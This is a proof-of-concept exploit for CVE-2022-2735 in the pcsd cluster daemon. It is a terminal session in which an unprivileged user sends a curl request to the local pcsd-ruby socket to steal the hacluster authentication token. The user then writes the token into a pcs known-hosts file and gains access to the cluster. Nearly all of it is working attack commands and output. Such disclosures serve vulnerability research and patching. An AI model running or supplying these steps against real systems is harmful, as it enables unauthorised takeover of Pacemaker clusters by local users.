POC [CVE-2022-2735] Steps to reproduce: [testuser@rhel90-node1 ~]$ pcs status Warning: Unable to read the known-hosts file: No such file or directory: '/home/testuser/.pcs/known-hosts' Error: Unable to authenticate against the local pcsd. Run the same command as root or authenticate yourself to the local pcsd using command 'pcs client local-auth' [testuser@rhel90-node1 ~]$ pcs client local-auth -u testuser -p 1234 Error: Access denied [testuser@rhel90-node1 ~]$ curl -X POST --unix-socket /var/run/pcsd-ruby.socket --header "X_PCSD_TYPE: sinatra_remote" http:/remote/remote/auth?username=hacluster | python3 -c "import sys, json, base64; print(base64.b64decode(json.load(sys.stdin)['body']).decode())" > token.tmp % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 159 0 159 0 0 79500 0 --:--:-- --:--:-- --:--:-- 155k [testuser@rhel90-node1 ~]$ cat token.tmp 9d320b2c-11e7-40c4-be7b-12795a1dc39e Once we have the token, we can either use it for calling REST API or save it into user’s configuration and use pcs commands [testuser@rhel90-node1 ~]$ mkdir -p ~/.pcs; export TOKEN=`cat token.tmp`; echo -e '{"format_version":1,"data_version":1,"known_hosts":{"localhost":{"dest_list":[{"addr":"localhost","port":2224}],"token":"$TOKEN"}}}' | envsubst > ~/.pcs/known-hosts [testuser@rhel90-node1 ~]$ pcs status Cluster name: testcluster Cluster Summary: * Stack: corosync * Current DC: localhost (version 2.1.2-4.el9-ada5c3b36e2) - partition with quorum * Last updated: Thu Aug 4 14:08:52 2022 * Last change: Thu Jun 16 15:30:00 2022 by hacluster via cibadmin on localhost * 1 node configured * 4 resource instances configured Node List: * Online: [ localhost ] Full List of Resources: * dummy (ocf:pacemaker:Dummy): Started localhost * dummy2 (ocf:pacemaker:Dummy): Started localhost * dummy3 (ocf:pacemaker:Dummy): Started localhost * Clone Set: dummy4-clone [dummy4]: * Started: [ localhost ] Daemon Status: corosync: active/disabled pacemaker: active/disabled pcsd: active/enabled